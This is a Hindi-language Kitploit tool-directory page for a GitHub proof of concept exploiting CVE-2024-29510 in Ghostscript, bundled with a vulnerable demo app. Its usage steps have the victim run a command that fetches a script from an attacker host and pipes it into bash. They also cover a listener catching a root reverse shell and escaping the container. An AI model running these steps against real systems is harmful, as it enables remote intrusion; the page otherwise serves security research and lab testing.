Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/swsmith2391/cve-2024-29510
Vulnerability AnalysisExploitationWeb Application ExploitationPayload DevelopmentContainer EscapeBinary Exploitation
GitHubswsmith2391/cve-2024-29510

CVE-2024-29510

POC code for CVE-2024-29510 and demo VulnApp

रिपॉजिटरी देखें
112 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

मूल शोध और POC कोड: https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/

नोट: मैंने निष्पादित कमांड के अलावा POC में कोई बदलाव नहीं किया है। पूरा श्रेय थॉमस रिन्समा @ Codean Labs को उनके अद्भुत शोध और POC के लिए जाता है।

स्थानीय परिदृश्य

  1. स्टेजर स्क्रिप्ट में लिपटा हुआ है जो होस्ट के कमजोर होने की जांच के लिए चेक स्क्रिप्ट डाउनलोड और चलाता है
  2. POC को Python3 रिवर्स शेल डाउनलोड और निष्पादित करने के लिए संशोधित किया गया
  3. स्टेजर और रिवर्स शेल STDIN के माध्यम से डाउनलोड और निष्पादित किए जाते हैं
  4. POC /tmp में रैंडम नाम के साथ एक आर्टिफैक्ट छोड़ता है

हमलावर होस्ट पर:

  1. pwncat-cs या netcat का उपयोग करके, 443 के लिए लिसनर बनाएं
  2. एक्सप्लॉइट डायरेक्टरी पर जाएं
  3. python3 -m http.server 80

पीड़ित होस्ट पर (Ubuntu 23.10, Ghostscript 10.01.2 चला रहा है):

  1. टर्मिनल खोलें और चलाएं: export RHOST=''; wget -q http://$RHOST/run -O - | bash &

दूरस्थ परिदृश्य (VulnApp)

  1. VulnApp बनाएं: 'docker build -t cve-2024-29510-demo:latest .' (इसके लिए Dockerfile डायरेक्टरी में https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10021/ghostscript-10.02.1.tar.gz की एक प्रतिलिपि आवश्यक है)
  2. VulnApp चलाएं: 'docker run --rm -p 5000:5000 cve-2024-29510-demo:latest'
  3. कार्यक्षमता जांचने के लिए good.ps को कन्वर्ट करने का प्रयास करें। इसे एक रेंडर किया हुआ PDF लौटाना चाहिए जिसमें रेखाएं एक तीर बनाती हैं, जैसे '>'
  4. पोर्ट 80 पर shell.html होस्ट करने के लिए वेब सर्वर सेटअप करें, उदा. 'python3 -m http.server 80'
  5. pwncat-cs या netcat का उपयोग करके, 443 के लिए लिसनर बनाएं
  6. bad.eps अपलोड करें, VulnApp हैंग हो जाएगा और लिसनर को कंटेनर के लिए एक रिवर्स शेल पकड़ना चाहिए (रूट के रूप में चल रहा है)
  7. कंटेनर से भागें!
टूल डाउनलोड करें